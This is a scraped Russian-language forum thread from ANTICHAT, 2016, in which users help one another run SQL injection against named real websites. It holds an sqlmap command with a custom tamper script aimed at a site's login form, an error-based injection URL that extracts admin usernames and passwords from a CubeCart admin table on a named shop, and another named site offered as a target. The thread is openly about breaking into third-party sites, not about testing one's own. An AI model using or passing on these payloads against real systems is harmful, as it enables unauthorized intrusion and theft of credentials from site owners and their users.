ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.09.2016, 15:01
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
↑
--tamper=name
не легче оставить ссылку на ресурс ?
в лс глянь
|
|
|
03.09.2016, 15:09
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
↑
--tamper=name
не легче оставить ссылку на ресурс ?
А на счёт тампера я сделал так --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init __.py файл подписал инпут расширение поставил внутрь засунул скрипт но идёт ошибка
Код:
[13:58:10] [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script 'C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py'
А вод полный запрос
Код:
sqlmap -u www.site.ru/ --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py --dbs
|
|
|
|
03.09.2016, 17:24
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от BabaDook
↑
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new[/COLOR][/COLOR]
допустим реально. Там W.A.F. Крутите.
Сообщение от r1l
↑
у меня два вопроса, я начинающий)
Что значит waf?
крутить так же --dbms=MySQL ?
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select( concat(username,0x3a,password))from(CubeCart_admin _users)limit+0,1))))
|
|
|
|
03.09.2016, 17:28
|
|
Новичок
Регистрация: 19.01.2016
Сообщений: 15
Провел на форуме:
4609
Репутация:
0
|
|
Сообщение от winstrool
↑
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select( concat(username,0x3a,password))from(CubeCart_admin _users)limit+0,1))))
не фурычит
|
|
|
|
03.09.2016, 18:16
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от r1l
↑
не фурычит
Попробуйте всё таки браузером обработать сылку
|
|
|
|
03.09.2016, 18:28
|
|
Новичок
Регистрация: 19.01.2016
Сообщений: 15
Провел на форуме:
4609
Репутация:
0
|
|
Сообщение от BabaDook
↑
Попробуйте всё таки браузером обработать сылку
еслиб я умел(
|
|
|
|
04.09.2016, 00:46
|
|
Новичок
Регистрация: 19.01.2016
Сообщений: 15
Провел на форуме:
4609
Репутация:
0
|
|
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
|
|
|
|
04.09.2016, 19:34
|
|
Участник форума
Регистрация: 08.01.2016
Сообщений: 118
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от r1l
↑
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
Видимо никто не понял вопроса.. Я в том числе
|
|
|
|
04.09.2016, 22:45
|
|
Новичок
Регистрация: 19.01.2016
Сообщений: 15
Провел на форуме:
4609
Репутация:
0
|
|
хелп
не раскручивает(
крутил как --dbms=MySQL --level=5 --risk=3 --random-agent
уязвимость точно есть, но не могу раскрутить(
Код:
http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497
|
|
|
|
04.09.2016, 22:53
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
↑
Видимо никто не понял вопроса.. Я в том числе
Он имеет введу слепую иньекцию
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
